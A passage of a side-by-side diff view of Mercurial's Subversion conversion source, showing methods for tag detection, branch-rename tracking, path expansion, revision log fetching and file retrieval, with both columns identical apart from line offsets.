737 if e.action == b'A' and e.copyfrom_path
747 if e.action == b'A' and e.copyfrom_path
738 }
748 }
739 badroots = set()
749 badroots = set()
740 for destroot in addeds:
750 for destroot in addeds:
741 for source, sourcerev, dest in pendings:
751 for source, sourcerev, dest in pendings:
742 if not dest.startswith(
752 if not dest.startswith(
743 destroot + b'/'
753 destroot + b'/'
744 ) or source.startswith(addeds[destroot] + b'/'):
754 ) or source.startswith(addeds[destroot] + b'/'):
745 continue
755 continue
746 badroots.add(destroot)
756 badroots.add(destroot)
747 break
757 break
748
758
749 for badroot in badroots:
759 for badroot in badroots:
750 pendings = [
760 pendings = [
751 p
761 p
752 for p in pendings
762 for p in pendings
753 if p[2] != badroot
763 if p[2] != badroot
754 and not p[2].startswith(badroot + b'/')
764 and not p[2].startswith(badroot + b'/')
755 ]
765 ]
756
766
757 # Tell tag renamings from tag creations
767 # Tell tag renamings from tag creations
758 renamings = []
768 renamings = []
759 for source, sourcerev, dest in pendings:
769 for source, sourcerev, dest in pendings:
760 tagname = dest.split(b'/')[-1]
770 tagname = dest.split(b'/')[-1]
761 if source.startswith(srctagspath):
771 if source.startswith(srctagspath):
762 renamings.append([source, sourcerev, tagname])
772 renamings.append([source, sourcerev, tagname])
763 continue
773 continue
764 if tagname in tags:
774 if tagname in tags:
765 # Keep the latest tag value
775 # Keep the latest tag value
766 continue
776 continue
767 # From revision may be fake, get one with changes
777 # From revision may be fake, get one with changes
768 try:
778 try:
769 tagid = self.latest(source, sourcerev)
779 tagid = self.latest(source, sourcerev)
770 if tagid and tagname not in tags:
780 if tagid and tagname not in tags:
771 tags[tagname] = tagid
781 tags[tagname] = tagid
772 except SvnPathNotFound:
782 except SvnPathNotFound:
773 # It happens when we are following directories
783 # It happens when we are following directories
774 # we assumed were copied with their parents
784 # we assumed were copied with their parents
775 # but were really created in the tag
785 # but were really created in the tag
776 # directory.
786 # directory.
777 pass
787 pass
778 pendings = renamings
788 pendings = renamings
779 tagspath = srctagspath
789 tagspath = srctagspath
780 finally:
790 finally:
781 stream.close()
791 stream.close()
782 return tags
792 return tags
783
793
784 def converted(self, rev, destrev):
794 def converted(self, rev, destrev):
785 if not self.wc:
795 if not self.wc:
786 return
796 return
787 if self.convertfp is None:
797 if self.convertfp is None:
788 self.convertfp = open(
798 self.convertfp = open(
789 os.path.join(self.wc, b'.svn', b'hg-shamap'), b'ab'
799 os.path.join(self.wc, b'.svn', b'hg-shamap'), b'ab'
790 )
800 )
791 self.convertfp.write(
801 self.convertfp.write(
792 util.tonativeeol(b'%s %d\n' % (destrev, self.revnum(rev)))
802 util.tonativeeol(b'%s %d\n' % (destrev, self.revnum(rev)))
793 )
803 )
794 self.convertfp.flush()
804 self.convertfp.flush()
795
805
796 def revid(self, revnum, module=None):
806 def revid(self, revnum, module=None):
797 return b'svn:%s%s@%d' % (self.uuid, module or self.module, revnum)
807 return b'svn:%s%s@%d' % (self.uuid, module or self.module, revnum)
798
808
799 def revnum(self, rev):
809 def revnum(self, rev):
800 return int(rev.split(b'@')[-1])
810 return int(rev.split(b'@')[-1])
801
811
802 def latest(self, path, stop=None):
812 def latest(self, path, stop=None):
803 """Find the latest revid affecting path, up to stop revision
813 """Find the latest revid affecting path, up to stop revision
804 number. If stop is None, default to repository latest
814 number. If stop is None, default to repository latest
805 revision. It may return a revision in a different module,
815 revision. It may return a revision in a different module,
806 since a branch may be moved without a change being
816 since a branch may be moved without a change being
807 reported. Return None if computed module does not belong to
817 reported. Return None if computed module does not belong to
808 rootmodule subtree.
818 rootmodule subtree.
809 """
819 """
810
820
811 def findchanges(path, start, stop=None):
821 def findchanges(path, start, stop=None):
812 stream = self._getlog([path], start, stop or 1)
822 stream = self._getlog([path], start, stop or 1)
813 try:
823 try:
814 for entry in stream:
824 for entry in stream:
815 paths, revnum, author, date, message = entry
825 paths, revnum, author, date, message = entry
816 if stop is None and paths:
826 if stop is None and paths:
817 # We do not know the latest changed revision,
827 # We do not know the latest changed revision,
818 # keep the first one with changed paths.
828 # keep the first one with changed paths.
819 break
829 break
820 if stop is not None and revnum <= stop:
830 if stop is not None and revnum <= stop:
821 break
831 break
822
832
823 for p in paths:
833 for p in paths:
824 if not path.startswith(p) or not paths[p].copyfrom_path:
834 if not path.startswith(p) or not paths[p].copyfrom_path:
825 continue
835 continue
826 newpath = paths[p].copyfrom_path + path[len(p) :]
836 newpath = paths[p].copyfrom_path + path[len(p) :]
827 self.ui.debug(
837 self.ui.debug(
828 b"branch renamed from %s to %s at %d\n"
838 b"branch renamed from %s to %s at %d\n"
829 % (path, newpath, revnum)
839 % (path, newpath, revnum)
830 )
840 )
831 path = newpath
841 path = newpath
832 break
842 break
833 if not paths:
843 if not paths:
834 revnum = None
844 revnum = None
835 return revnum, path
845 return revnum, path
836 finally:
846 finally:
837 stream.close()
847 stream.close()
838
848
839 if not path.startswith(self.rootmodule):
849 if not path.startswith(self.rootmodule):
840 # Requests on foreign branches may be forbidden at server level
850 # Requests on foreign branches may be forbidden at server level
841 self.ui.debug(b'ignoring foreign branch %r\n' % path)
851 self.ui.debug(b'ignoring foreign branch %r\n' % path)
842 return None
852 return None
843
853
844 if stop is None:
854 if stop is None:
845 stop = svn.ra.get_latest_revnum(self.ra)
855 stop = svn.ra.get_latest_revnum(self.ra)
846 try:
856 try:
847 prevmodule = self.reparent(b'')
857 prevmodule = self.reparent(b'')
848 dirent = svn.ra.stat(self.ra, path.strip(b'/'), stop)
858 dirent = svn.ra.stat(self.ra, path.strip(b'/'), stop)
849 self.reparent(prevmodule)
859 self.reparent(prevmodule)
850 except svn.core.SubversionException:
860 except svn.core.SubversionException:
851 dirent = None
861 dirent = None
852 if not dirent:
862 if not dirent:
853 raise SvnPathNotFound(
863 raise SvnPathNotFound(
854 _(b'%s not found up to revision %d') % (path, stop)
864 _(b'%s not found up to revision %d') % (path, stop)
855 )
865 )
856
866
857 # stat() gives us the previous revision on this line of
867 # stat() gives us the previous revision on this line of
858 # development, but it might be in *another module*. Fetch the
868 # development, but it might be in *another module*. Fetch the
859 # log and detect renames down to the latest revision.
869 # log and detect renames down to the latest revision.
860 revnum, realpath = findchanges(path, stop, dirent.created_rev)
870 revnum, realpath = findchanges(path, stop, dirent.created_rev)
861 if revnum is None:
871 if revnum is None:
862 # Tools like svnsync can create empty revision, when
872 # Tools like svnsync can create empty revision, when
863 # synchronizing only a subtree for instance. These empty
873 # synchronizing only a subtree for instance. These empty
864 # revisions created_rev still have their original values
874 # revisions created_rev still have their original values
865 # despite all changes having disappeared and can be
875 # despite all changes having disappeared and can be
866 # returned by ra.stat(), at least when stating the root
876 # returned by ra.stat(), at least when stating the root
867 # module. In that case, do not trust created_rev and scan
877 # module. In that case, do not trust created_rev and scan
868 # the whole history.
878 # the whole history.
869 revnum, realpath = findchanges(path, stop)
879 revnum, realpath = findchanges(path, stop)
870 if revnum is None:
880 if revnum is None:
871 self.ui.debug(b'ignoring empty branch %r\n' % realpath)
881 self.ui.debug(b'ignoring empty branch %r\n' % realpath)
872 return None
882 return None
873
883
874 if not realpath.startswith(self.rootmodule):
884 if not realpath.startswith(self.rootmodule):
875 self.ui.debug(b'ignoring foreign branch %r\n' % realpath)
885 self.ui.debug(b'ignoring foreign branch %r\n' % realpath)
876 return None
886 return None
877 return self.revid(revnum, realpath)
887 return self.revid(revnum, realpath)
878
888
879 def reparent(self, module):
889 def reparent(self, module):
880 """Reparent the svn transport and return the previous parent."""
890 """Reparent the svn transport and return the previous parent."""
881 if self.prevmodule == module:
891 if self.prevmodule == module:
882 return module
892 return module
883 svnurl = self.baseurl + quote(module)
893 svnurl = self.baseurl + quote(module)
884 prevmodule = self.prevmodule
894 prevmodule = self.prevmodule
885 if prevmodule is None:
895 if prevmodule is None:
886 prevmodule = b''
896 prevmodule = b''
887 self.ui.debug(b"reparent to %s\n" % svnurl)
897 self.ui.debug(b"reparent to %s\n" % svnurl)
888 svn.ra.reparent(self.ra, svnurl)
898 svn.ra.reparent(self.ra, svnurl)
889 self.prevmodule = module
899 self.prevmodule = module
890 return prevmodule
900 return prevmodule
891
901
892 def expandpaths(self, rev, paths, parents):
902 def expandpaths(self, rev, paths, parents):
893 changed, removed = set(), set()
903 changed, removed = set(), set()
894 copies = {}
904 copies = {}
895
905
896 new_module, revnum = revsplit(rev)[1:]
906 new_module, revnum = revsplit(rev)[1:]
897 if new_module != self.module:
907 if new_module != self.module:
898 self.module = new_module
908 self.module = new_module
899 self.reparent(self.module)
909 self.reparent(self.module)
900
910
901 progress = self.ui.makeprogress(
911 progress = self.ui.makeprogress(
902 _(b'scanning paths'), unit=_(b'paths'), total=len(paths)
912 _(b'scanning paths'), unit=_(b'paths'), total=len(paths)
903 )
913 )
904 for i, (path, ent) in enumerate(paths):
914 for i, (path, ent) in enumerate(paths):
905 progress.update(i, item=path)
915 progress.update(i, item=path)
906 entrypath = self.getrelpath(path)
916 entrypath = self.getrelpath(path)
907
917
908 kind = self._checkpath(entrypath, revnum)
918 kind = self._checkpath(entrypath, revnum)
909 if kind == svn.core.svn_node_file:
919 if kind == svn.core.svn_node_file:
910 changed.add(self.recode(entrypath))
920 changed.add(self.recode(entrypath))
911 if not ent.copyfrom_path or not parents:
921 if not ent.copyfrom_path or not parents:
912 continue
922 continue
913 # Copy sources not in parent revisions cannot be
923 # Copy sources not in parent revisions cannot be
914 # represented, ignore their origin for now
924 # represented, ignore their origin for now
915 pmodule, prevnum = revsplit(parents[0])[1:]
925 pmodule, prevnum = revsplit(parents[0])[1:]
916 if ent.copyfrom_rev < prevnum:
926 if ent.copyfrom_rev < prevnum:
917 continue
927 continue
918 copyfrom_path = self.getrelpath(ent.copyfrom_path, pmodule)
928 copyfrom_path = self.getrelpath(ent.copyfrom_path, pmodule)
919 if not copyfrom_path:
929 if not copyfrom_path:
920 continue
930 continue
921 self.ui.debug(
931 self.ui.debug(
922 b"copied to %s from %s@%d\n"
932 b"copied to %s from %s@%d\n"
923 % (entrypath, copyfrom_path, ent.copyfrom_rev)
933 % (entrypath, copyfrom_path, ent.copyfrom_rev)
924 )
934 )
925 copies[self.recode(entrypath)] = self.recode(copyfrom_path)
935 copies[self.recode(entrypath)] = self.recode(copyfrom_path)
926 elif kind == 0: # gone, but had better be a deleted *file*
936 elif kind == 0: # gone, but had better be a deleted *file*
927 self.ui.debug(b"gone from %d\n" % ent.copyfrom_rev)
937 self.ui.debug(b"gone from %d\n" % ent.copyfrom_rev)
928 pmodule, prevnum = revsplit(parents[0])[1:]
938 pmodule, prevnum = revsplit(parents[0])[1:]
929 parentpath = pmodule + b"/" + entrypath
939 parentpath = pmodule + b"/" + entrypath
930 fromkind = self._checkpath(entrypath, prevnum, pmodule)
940 fromkind = self._checkpath(entrypath, prevnum, pmodule)
931
941
932 if fromkind == svn.core.svn_node_file:
942 if fromkind == svn.core.svn_node_file:
933 removed.add(self.recode(entrypath))
943 removed.add(self.recode(entrypath))
934 elif fromkind == svn.core.svn_node_dir:
944 elif fromkind == svn.core.svn_node_dir:
935 oroot = parentpath.strip(b'/')
945 oroot = parentpath.strip(b'/')
936 nroot = path.strip(b'/')
946 nroot = path.strip(b'/')
937 children = self._iterfiles(oroot, prevnum)
947 children = self._iterfiles(oroot, prevnum)
938 for childpath in children:
948 for childpath in children:
939 childpath = childpath.replace(oroot, nroot)
949 childpath = childpath.replace(oroot, nroot)
940 childpath = self.getrelpath(b"/" + childpath, pmodule)
950 childpath = self.getrelpath(b"/" + childpath, pmodule)
941 if childpath:
951 if childpath:
942 removed.add(self.recode(childpath))
952 removed.add(self.recode(childpath))
943 else:
953 else:
944 self.ui.debug(
954 self.ui.debug(
945 b'unknown path in revision %d: %s\n' % (revnum, path)
955 b'unknown path in revision %d: %s\n' % (revnum, path)
946 )
956 )
947 elif kind == svn.core.svn_node_dir:
957 elif kind == svn.core.svn_node_dir:
948 if ent.action == b'M':
958 if ent.action == b'M':
949 # If the directory just had a prop change,
959 # If the directory just had a prop change,
950 # then we shouldn't need to look for its children.
960 # then we shouldn't need to look for its children.
951 continue
961 continue
952 if ent.action == b'R' and parents:
962 if ent.action == b'R' and parents:
953 # If a directory is replacing a file, mark the previous
963 # If a directory is replacing a file, mark the previous
954 # file as deleted
964 # file as deleted
955 pmodule, prevnum = revsplit(parents[0])[1:]
965 pmodule, prevnum = revsplit(parents[0])[1:]
956 pkind = self._checkpath(entrypath, prevnum, pmodule)
966 pkind = self._checkpath(entrypath, prevnum, pmodule)
957 if pkind == svn.core.svn_node_file:
967 if pkind == svn.core.svn_node_file:
958 removed.add(self.recode(entrypath))
968 removed.add(self.recode(entrypath))
959 elif pkind == svn.core.svn_node_dir:
969 elif pkind == svn.core.svn_node_dir:
960 # We do not know what files were kept or removed,
970 # We do not know what files were kept or removed,
961 # mark them all as changed.
971 # mark them all as changed.
962 for childpath in self._iterfiles(pmodule, prevnum):
972 for childpath in self._iterfiles(pmodule, prevnum):
963 childpath = self.getrelpath(b"/" + childpath)
973 childpath = self.getrelpath(b"/" + childpath)
964 if childpath:
974 if childpath:
965 changed.add(self.recode(childpath))
975 changed.add(self.recode(childpath))
966
976
967 for childpath in self._iterfiles(path, revnum):
977 for childpath in self._iterfiles(path, revnum):
968 childpath = self.getrelpath(b"/" + childpath)
978 childpath = self.getrelpath(b"/" + childpath)
969 if childpath:
979 if childpath:
970 changed.add(self.recode(childpath))
980 changed.add(self.recode(childpath))
971
981
972 # Handle directory copies
982 # Handle directory copies
973 if not ent.copyfrom_path or not parents:
983 if not ent.copyfrom_path or not parents:
974 continue
984 continue
975 # Copy sources not in parent revisions cannot be
985 # Copy sources not in parent revisions cannot be
976 # represented, ignore their origin for now
986 # represented, ignore their origin for now
977 pmodule, prevnum = revsplit(parents[0])[1:]
987 pmodule, prevnum = revsplit(parents[0])[1:]
978 if ent.copyfrom_rev < prevnum:
988 if ent.copyfrom_rev < prevnum:
979 continue
989 continue
980 copyfrompath = self.getrelpath(ent.copyfrom_path, pmodule)
990 copyfrompath = self.getrelpath(ent.copyfrom_path, pmodule)
981 if not copyfrompath:
991 if not copyfrompath:
982 continue
992 continue
983 self.ui.debug(
993 self.ui.debug(
984 b"mark %s came from %s:%d\n"
994 b"mark %s came from %s:%d\n"
985 % (path, copyfrompath, ent.copyfrom_rev)
995 % (path, copyfrompath, ent.copyfrom_rev)
986 )
996 )
987 children = self._iterfiles(ent.copyfrom_path, ent.copyfrom_rev)
997 children = self._iterfiles(ent.copyfrom_path, ent.copyfrom_rev)
988 for childpath in children:
998 for childpath in children:
989 childpath = self.getrelpath(b"/" + childpath, pmodule)
999 childpath = self.getrelpath(b"/" + childpath, pmodule)
990 if not childpath:
1000 if not childpath:
991 continue
1001 continue
992 copytopath = path + childpath[len(copyfrompath) :]
1002 copytopath = path + childpath[len(copyfrompath) :]
993 copytopath = self.getrelpath(copytopath)
1003 copytopath = self.getrelpath(copytopath)
994 copies[self.recode(copytopath)] = self.recode(childpath)
1004 copies[self.recode(copytopath)] = self.recode(childpath)
995
1005
996 progress.complete()
1006 progress.complete()
997 changed.update(removed)
1007 changed.update(removed)
998 return (list(changed), removed, copies)
1008 return (list(changed), removed, copies)
999
1009
1000 def _fetch_revisions(self, from_revnum, to_revnum):
1010 def _fetch_revisions(self, from_revnum, to_revnum):
1001 if from_revnum < to_revnum:
1011 if from_revnum < to_revnum:
1002 from_revnum, to_revnum = to_revnum, from_revnum
1012 from_revnum, to_revnum = to_revnum, from_revnum
1003
1013
1004 self.child_cset = None
1014 self.child_cset = None
1005
1015
1006 def parselogentry(orig_paths, revnum, author, date, message):
1016 def parselogentry(orig_paths, revnum, author, date, message):
1007 """Return the parsed commit object or None, and True if
1017 """Return the parsed commit object or None, and True if
1008 the revision is a branch root.
1018 the revision is a branch root.
1009 """
1019 """
1010 self.ui.debug(
1020 self.ui.debug(
1011 b"parsing revision %d (%d changes)\n"
1021 b"parsing revision %d (%d changes)\n"
1012 % (revnum, len(orig_paths))
1022 % (revnum, len(orig_paths))
1013 )
1023 )
1014
1024
1015 branched = False
1025 branched = False
1016 rev = self.revid(revnum)
1026 rev = self.revid(revnum)
1017 # branch log might return entries for a parent we already have
1027 # branch log might return entries for a parent we already have
1018
1028
1019 if rev in self.commits or revnum < to_revnum:
1029 if rev in self.commits or revnum < to_revnum:
1020 return None, branched
1030 return None, branched
1021
1031
1022 parents = []
1032 parents = []
1023 # check whether this revision is the start of a branch or part
1033 # check whether this revision is the start of a branch or part
1024 # of a branch renaming
1034 # of a branch renaming
1025 orig_paths = sorted(pycompat.iteritems(orig_paths))
1035 orig_paths = sorted(pycompat.iteritems(orig_paths))
1026 root_paths = [
1036 root_paths = [
1027 (p, e) for p, e in orig_paths if self.module.startswith(p)
1037 (p, e) for p, e in orig_paths if self.module.startswith(p)
1028 ]
1038 ]
1029 if root_paths:
1039 if root_paths:
1030 path, ent = root_paths[-1]
1040 path, ent = root_paths[-1]
1031 if ent.copyfrom_path:
1041 if ent.copyfrom_path:
1032 branched = True
1042 branched = True
1033 newpath = ent.copyfrom_path + self.module[len(path) :]
1043 newpath = ent.copyfrom_path + self.module[len(path) :]
1034 # ent.copyfrom_rev may not be the actual last revision
1044 # ent.copyfrom_rev may not be the actual last revision
1035 previd = self.latest(newpath, ent.copyfrom_rev)
1045 previd = self.latest(newpath, ent.copyfrom_rev)
1036 if previd is not None:
1046 if previd is not None:
1037 prevmodule, prevnum = revsplit(previd)[1:]
1047 prevmodule, prevnum = revsplit(previd)[1:]
1038 if prevnum >= self.startrev:
1048 if prevnum >= self.startrev:
1039 parents = [previd]
1049 parents = [previd]
1040 self.ui.note(
1050 self.ui.note(
1041 _(b'found parent of branch %s at %d: %s\n')
1051 _(b'found parent of branch %s at %d: %s\n')
1042 % (self.module, prevnum, prevmodule)
1052 % (self.module, prevnum, prevmodule)
1043 )
1053 )
1044 else:
1054 else:
1045 self.ui.debug(b"no copyfrom path, don't know what to do.\n")
1055 self.ui.debug(b"no copyfrom path, don't know what to do.\n")
1046
1056
1047 paths = []
1057 paths = []
1048 # filter out unrelated paths
1058 # filter out unrelated paths
1049 for path, ent in orig_paths:
1059 for path, ent in orig_paths:
1050 if self.getrelpath(path) is None:
1060 if self.getrelpath(path) is None:
1051 continue
1061 continue
1052 paths.append((path, ent))
1062 paths.append((path, ent))
1053
1063
1054 # Example SVN datetime. Includes microseconds.
1064 # Example SVN datetime. Includes microseconds.
1055 # ISO-8601 conformant
1065 # ISO-8601 conformant
1056 # '2007-01-04T17:35:00.902377Z'
1066 # '2007-01-04T17:35:00.902377Z'
1057 date = dateutil.parsedate(
1067 date = dateutil.parsedate(
1058 date[:19] + b" UTC", [b"%Y-%m-%dT%H:%M:%S"]
1068 date[:19] + b" UTC", [b"%Y-%m-%dT%H:%M:%S"]
1059 )
1069 )
1060 if self.ui.configbool(b'convert', b'localtimezone'):
1070 if self.ui.configbool(b'convert', b'localtimezone'):
1061 date = makedatetimestamp(date[0])
1071 date = makedatetimestamp(date[0])
1062
1072
1063 if message:
1073 if message:
1064 log = self.recode(message)
1074 log = self.recode(message)
1065 else:
1075 else:
1066 log = b''
1076 log = b''
1067
1077
1068 if author:
1078 if author:
1069 author = self.recode(author)
1079 author = self.recode(author)
1070 else:
1080 else:
1071 author = b''
1081 author = b''
1072
1082
1073 try:
1083 try:
1074 branch = self.module.split(b"/")[-1]
1084 branch = self.module.split(b"/")[-1]
1075 if branch == self.trunkname:
1085 if branch == self.trunkname:
1076 branch = None
1086 branch = None
1077 except IndexError:
1087 except IndexError:
1078 branch = None
1088 branch = None
1079
1089
1080 cset = commit(
1090 cset = commit(
1081 author=author,
1091 author=author,
1082 date=dateutil.datestr(date, b'%Y-%m-%d %H:%M:%S %1%2'),
1092 date=dateutil.datestr(date, b'%Y-%m-%d %H:%M:%S %1%2'),
1083 desc=log,
1093 desc=log,
1084 parents=parents,
1094 parents=parents,
1085 branch=branch,
1095 branch=branch,
1086 rev=rev,
1096 rev=rev,
1087 )
1097 )
1088
1098
1089 self.commits[rev] = cset
1099 self.commits[rev] = cset
1090 # The parents list is *shared* among self.paths and the
1100 # The parents list is *shared* among self.paths and the
1091 # commit object. Both will be updated below.
1101 # commit object. Both will be updated below.
1092 self.paths[rev] = (paths, cset.parents)
1102 self.paths[rev] = (paths, cset.parents)
1093 if self.child_cset and not self.child_cset.parents:
1103 if self.child_cset and not self.child_cset.parents:
1094 self.child_cset.parents[:] = [rev]
1104 self.child_cset.parents[:] = [rev]
1095 self.child_cset = cset
1105 self.child_cset = cset
1096 return cset, branched
1106 return cset, branched
1097
1107
1098 self.ui.note(
1108 self.ui.note(
1099 _(b'fetching revision log for "%s" from %d to %d\n')
1109 _(b'fetching revision log for "%s" from %d to %d\n')
1100 % (self.module, from_revnum, to_revnum)
1110 % (self.module, from_revnum, to_revnum)
1101 )
1111 )
1102
1112
1103 try:
1113 try:
1104 firstcset = None
1114 firstcset = None
1105 lastonbranch = False
1115 lastonbranch = False
1106 stream = self._getlog([self.module], from_revnum, to_revnum)
1116 stream = self._getlog([self.module], from_revnum, to_revnum)
1107 try:
1117 try:
1108 for entry in stream:
1118 for entry in stream:
1109 paths, revnum, author, date, message = entry
1119 paths, revnum, author, date, message = entry
1110 if revnum < self.startrev:
1120 if revnum < self.startrev:
1111 lastonbranch = True
1121 lastonbranch = True
1112 break
1122 break
1113 if not paths:
1123 if not paths:
1114 self.ui.debug(b'revision %d has no entries\n' % revnum)
1124 self.ui.debug(b'revision %d has no entries\n' % revnum)
1115 # If we ever leave the loop on an empty
1125 # If we ever leave the loop on an empty
1116 # revision, do not try to get a parent branch
1126 # revision, do not try to get a parent branch
1117 lastonbranch = lastonbranch or revnum == 0
1127 lastonbranch = lastonbranch or revnum == 0
1118 continue
1128 continue
1119 cset, lastonbranch = parselogentry(
1129 cset, lastonbranch = parselogentry(
1120 paths, revnum, author, date, message
1130 paths, revnum, author, date, message
1121 )
1131 )
1122 if cset:
1132 if cset:
1123 firstcset = cset
1133 firstcset = cset
1124 if lastonbranch:
1134 if lastonbranch:
1125 break
1135 break
1126 finally:
1136 finally:
1127 stream.close()
1137 stream.close()
1128
1138
1129 if not lastonbranch and firstcset and not firstcset.parents:
1139 if not lastonbranch and firstcset and not firstcset.parents:
1130 # The first revision of the sequence (the last fetched one)
1140 # The first revision of the sequence (the last fetched one)
1131 # has invalid parents if not a branch root. Find the parent
1141 # has invalid parents if not a branch root. Find the parent
1132 # revision now, if any.
1142 # revision now, if any.
1133 try:
1143 try:
1134 firstrevnum = self.revnum(firstcset.rev)
1144 firstrevnum = self.revnum(firstcset.rev)
1135 if firstrevnum > 1:
1145 if firstrevnum > 1:
1136 latest = self.latest(self.module, firstrevnum - 1)
1146 latest = self.latest(self.module, firstrevnum - 1)
1137 if latest:
1147 if latest:
1138 firstcset.parents.append(latest)
1148 firstcset.parents.append(latest)
1139 except SvnPathNotFound:
1149 except SvnPathNotFound:
1140 pass
1150 pass
1141 except svn.core.SubversionException as xxx_todo_changeme:
1151 except svn.core.SubversionException as xxx_todo_changeme:
1142 (inst, num) = xxx_todo_changeme.args
1152 (inst, num) = xxx_todo_changeme.args
1143 if num == svn.core.SVN_ERR_FS_NO_SUCH_REVISION:
1153 if num == svn.core.SVN_ERR_FS_NO_SUCH_REVISION:
1144 raise error.Abort(
1154 raise error.Abort(
1145 _(b'svn: branch has no revision %s') % to_revnum
1155 _(b'svn: branch has no revision %s') % to_revnum
1146 )
1156 )
1147 raise
1157 raise
1148
1158
1149 def getfile(self, file, rev):
1159 def getfile(self, file, rev):
1150 # TODO: ra.get_file transmits the whole file instead of diffs.
1160 # TODO: ra.get_file transmits the whole file instead of diffs.
1151 if file in self.removed:
1161 if file in self.removed:
1152 return None, None
1162 return None, None
1153 try:
1163 try:
1154 new_module, revnum = revsplit(rev)[1:]
1164 new_module, revnum = revsplit(rev)[1:]
1155 if self.module != new_module:
1165 if self.module != new_module:
1156 self.module = new_module
1166 self.module = new_module
1157 self.reparent(self.module)
1167 self.reparent(self.module)
1158 io = stringio()
1168 io = stringio()
1159 info = svn.ra.get_file(self.ra, file, revnum, io)
1169 info = svn.ra.get_file(self.ra, file, revnum, io)
1160 data = io.getvalue()
1170 data = io.getvalue()
1161 # ra.get_file() seems to keep a reference on the input buffer
1171 # ra.get_file() seems to keep a reference on the input buffer
1162 # preventing collection. Release it explicitly.
1172 # preventing collection. Release it explicitly.
1163 io.close()
1173 io.close()
1164 if isinstance(info, list):
1174 if isinstance(info, list):
1165 info = info[-1]
1175 info = info[-1]
1166 mode = (b"svn:executable" in info) and b'x' or b''
1176 mode = (b"svn:executable" in info) and b'x' or b''
1167 mode = (b"svn:special" in info) and b'l' or mode
1177 mode = (b"svn:special" in info) and b'l' or mode
1168 except svn.core.SubversionException as e:
1178 except svn.core.SubversionException as e:
1169 notfound = (
1179 notfound = (
1170 svn.core.SVN_ERR_FS_NOT_FOUND,
1180 svn.core.SVN_ERR_FS_NOT_FOUND,
1171 svn.core.SVN_ERR_RA_DAV_PATH_NOT_FOUND,
1181 svn.core.SVN_ERR_RA_DAV_PATH_NOT_FOUND,
1172 )
1182 )
1173 if e.apr_err in notfound: # File not found
1183 if e.apr_err in notfound: # File not found
1174 return None, None
1184 return None, None
1175 raise
1185 raise
1176 if mode == b'l':
1186 if mode == b'l':
1177 link_prefix = b"link "
1187 link_prefix = b"link "
1178 if data.startswith(link_prefix):
1188 if data.startswith(link_prefix):
1179 data = data[len(link_prefix) :]
1189 data = data[len(link_prefix) :]
1180 return data, mode
1190 return data, mode
1181
1191
1182 def _iterfiles(self, path, revnum):
1192 def _iterfiles(self, path, revnum):
1183 """Enumerate all files in path at revnum, recursively."""
1193 """Enumerate all files in path at revnum, recursively."""
1184 path = path.strip(b'/')
1194 path = path.strip(b'/')
1185 pool = svn.core.Pool()
1195 pool = svn.core.Pool()
1186 rpath = b'/'.join([self.baseurl, quote(path)]).strip(b'/')
1196 rpath = b'/'.join([self.baseurl, quote(path)]).strip(b'/')
1187 entries = svn.client.ls(rpath, optrev(revnum), True, self.ctx, pool)
1197 entries = svn.client.ls(rpath, optrev(revnum), True, self.ctx, pool)
1188 if path:
1198 if path:
1189 path += b'/'
1199 path += b'/'
1190 return (
1200 return (
1191 (path + p)
1201 (path + p)
1192 for p, e in pycompat.iteritems(entries)
1202 for p, e in pycompat.iteritems(entries)
1193 if e.kind == svn.core.svn_node_file
1203 if e.kind == svn.core.svn_node_file
1194 )
1204 )
1195
1205
1196 def getrelpath(self, path, module=None):
1206 def getrelpath(self, path, module=None):
1197 if module is None:
1207 if module is None:
1198 module = self.module
1208 module = self.module
1199 # Given the repository url of this wc, say
1209 # Given the repository url of this wc, say
1200 # "http://server/plone/CMFPlone/branches/Plone-2_0-branch"
1210 # "http://server/plone/CMFPlone/branches/Plone-2_0-branch"
1201 # extract the "entry" portion (a relative path) from what
1211 # extract the "entry" portion (a relative path) from what
1202 # svn log --xml says, i.e.
1212 # svn log --xml says, i.e.
1203 # "/CMFPlone/branches/Plone-2_0-branch/tests/PloneTestCase.py"
1213 # "/CMFPlone/branches/Plone-2_0-branch/tests/PloneTestCase.py"
1204 # that is to say "tests/PloneTestCase.py"
1214 # that is to say "tests/PloneTestCase.py"
1205 if path.startswith(module):
1215 if path.startswith(module):
1206 relative = path.rstrip(b'/')[len(module) :]
1216 relative = path.rstrip(b'/')[len(module) :]
1207 if relative.startswith(b'/'):
1217 if relative.startswith(b'/'):
1208 return relative[1:]
1218 return relative[1:]
1209 elif relative == b'':
1219 elif relative == b'':
1210 return relative
1220 return relative
1211
1221
1212 # The path is outside our tracked tree...
1222 # The path is outside our tracked tree...
1213 self.ui.debug(
1223 self.ui.debug(
1214 b'%r is not under %r, ignoring\n'
1224 b'%r is not under %r, ignoring\n'
1215 % (pycompat.bytestr(path), pycompat.bytestr(module))
1225 % (pycompat.bytestr(path), pycompat.bytestr(module))
1216 )
1226 )
1217 return None
1227 return None
1218
1228
1219 def _checkpath(self, path, revnum, module=None):
1229 def _checkpath(self, path, revnum, module=None):
1220 if module is not None:
1230 if module is not None:
1221 prevmodule = self.reparent(b'')
1231 prevmodule = self.reparent(b'')
1222 path = module + b'/' + path
1232 path = module + b'/' + path
1223 try:
1233 try:
1224 # ra.check_path does not like leading slashes very much, it leads
1234 # ra.check_path does not like leading slashes very much, it leads
1225 # to PROPFIND subversion errors
1235 # to PROPFIND subversion errors
1226 return svn.ra.check_path(self.ra, path.strip(b'/'), revnum)
1236 return svn.ra.check_path(self.ra, path.strip(b'/'), revnum)
1227 finally:
1237 finally:
1228 if module is not None:
1238 if module is not None:
1229 self.reparent(prevmodule)
1239 self.reparent(prevmodule)
1230
1240
1231 def _getlog(
1241 def _getlog(
1232 self,
1242 self,
1233 paths,
1243 paths,
1234 start,
1244 start,
1235 end,
1245 end,
1236 limit=0,
1246 limit=0,
1237 discover_changed_paths=True,
1247 discover_changed_paths=True,
1238 strict_node_history=False,
1248 strict_node_history=False,
1239 ):
1249 ):
1240 # Normalize path names, svn >= 1.5 only wants paths relative to
1250 # Normalize path names, svn >= 1.5 only wants paths relative to
1241 # supplied URL
1251 # supplied URL
1242 relpaths = []
1252 relpaths = []
1243 for p in paths:
1253 for p in paths:
1244 if not p.startswith(b'/'):
1254 if not p.startswith(b'/'):
1245 p = self.module + b'/' + p
1255 p = self.module + b'/' + p
1246 relpaths.append(p.strip(b'/'))
1256 relpaths.append(p.strip(b'/'))
1247 args = [
1257 args = [
1248 self.baseurl,
1258 self.baseurl,
1249 relpaths,
1259 relpaths,
1250 start,
1260 start,
1251 end,
1261 end,
1252 limit,
1262 limit,
1253 discover_changed_paths,
1263 discover_changed_paths,
1254 strict_node_history,
1264 strict_node_history,
1255 ]
1265 ]
